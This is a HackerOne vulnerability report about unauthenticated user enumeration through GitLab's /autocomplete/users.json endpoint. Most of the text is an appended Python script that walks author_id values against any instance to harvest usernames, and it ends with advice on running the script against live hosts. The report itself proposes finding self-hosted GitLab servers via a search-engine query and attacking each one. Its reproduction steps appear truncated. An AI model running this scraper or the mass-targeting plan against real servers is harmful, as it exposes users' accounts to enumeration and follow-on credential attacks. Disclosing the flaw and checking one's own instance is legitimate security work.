HackerOne reported issue: /autocomplete/users.json can be used to enumerate users without authenticating
I've verified this finding. An attacker can walk all usernames without having an account.
Title: Backend endpoint can be used to perform User ID and Username enumeration of gitlab.com (and self-hosted gitlab installations)
Weakness: Information Disclosure
Date: 2017-05-04 11:06:40 +0000
The endpoint (/autocomplete/users.json) can be accessed without a valid login and allows user ids and usernames to be enumerated.
To replicate the attack:
- Open Chrome in incognito mode.
The user ids and usernames can be enumerated through the parameter
This vulnerability can be leveraged to identify user ids and usernames on self-hosted GitLab installations. An example of an attack would be:
- Search for "Sign in gitlab" using Google Search. This would return a list of publicly accessible self-hosted installations of gitlab.
- Attempt the vulnerable endpoint on the returned sites.
This issue is observed in our self-hosted installation of Gitlab CE v9.1.2.
2017-05-04 11:12:20 +0000: @evelynleems (comment)
Just to add on, a script can be created to iterate the author_id to obtain the list of user ids and usernames on the system.
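The enumeration loop the comment above describes, as an added example that is not part of the report or of GitLab's own code. It walks author_id over a range of values against /autocomplete/users.json with no session, merges every user object that comes back, and includes a one-request check for your own instance. The response shape (a JSON list of objects carrying "id" and "username"), the 401/403 answer of a fixed instance, the hostname gitlab.example and the FAKE_USERS table are assumptions constructed for the offline demo, not facts taken from the report.

```python
# Added example (not from the report or from GitLab): walk
# /autocomplete/users.json?author_id=N without a session and collect the
# id/username pairs it returns. The JSON shape (list of {"id", "username"})
# and the 401/403 reply of a fixed instance are assumptions.
import json
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, List, Optional, Tuple

FetchFn = Callable[[str], Optional[List[dict]]]


def http_fetch(url: str) -> Optional[List[dict]]:
    """Unauthenticated GET. Returns the parsed JSON list, None if the server
    refuses the request (401/403), and re-raises anything else."""
    req = urllib.request.Request(url, headers={"Accept": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return json.loads(resp.read().decode("utf-8"))
    except urllib.error.HTTPError as err:
        if err.code in (401, 403):
            return None
        raise


def autocomplete_url(base_url: str, author_id: int) -> str:
    """Build the vulnerable URL for one author_id value."""
    query = urllib.parse.urlencode({"author_id": author_id})
    return f"{base_url.rstrip('/')}/autocomplete/users.json?{query}"


def enumerate_users(base_url: str, start: int, stop: int,
                    fetch: FetchFn = http_fetch) -> Tuple[Dict[int, str], int]:
    """Iterate author_id over [start, stop] and merge every user object seen.
    Returns (id -> username, number of refused requests)."""
    found: Dict[int, str] = {}
    refused = 0
    for author_id in range(start, stop + 1):
        body = fetch(autocomplete_url(base_url, author_id))
        if body is None:
            refused += 1
            continue
        for user in body:
            if isinstance(user, dict) and "id" in user and "username" in user:
                found[int(user["id"])] = str(user["username"])
    return found, refused


def is_exposed(base_url: str, fetch: FetchFn = http_fetch) -> bool:
    """Single-request check for your own instance: an anonymous request that
    gets a user list back means the endpoint is still exposed."""
    body = fetch(autocomplete_url(base_url, 1))
    return bool(body)


# --- constructed offline stand-in for a vulnerable instance -----------------
FAKE_USERS = {  # constructed sample data, not real accounts
    1: "root", 2: "alice", 3: "bob", 7: "carol", 42: "dave",
}
DEFAULT_PAGE = [1, 2, 3]  # ids the endpoint is assumed to list by default


def vulnerable_fetch(url: str) -> Optional[List[dict]]:
    """Mimics the unauthenticated behaviour from the report: the requested
    author_id is prepended to a short default list (assumed shape)."""
    qs = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
    author_id = int(qs.get("author_id", ["0"])[0])
    ids = ([author_id] if author_id in FAKE_USERS else []) + DEFAULT_PAGE
    seen: List[int] = []
    for uid in ids:
        if uid not in seen:
            seen.append(uid)
    return [{"id": uid, "username": FAKE_USERS[uid]} for uid in seen]


def patched_fetch(url: str) -> Optional[List[dict]]:
    """A fixed instance rejects anonymous requests (assumed 401 -> None)."""
    return None


if __name__ == "__main__":
    users, refused = enumerate_users("https://gitlab.example", 1, 50, vulnerable_fetch)
    print(f"{len(users)} users leaked, {refused} requests refused: {users}")
    print("patched instance exposed?", is_exposed("https://gitlab.example", patched_fetch))
```

Against a live host, pass no fetch argument so http_fetch is used; the refused counter tells you at a glance whether the instance answers anonymous requests at all, which is the property the fix has to remove.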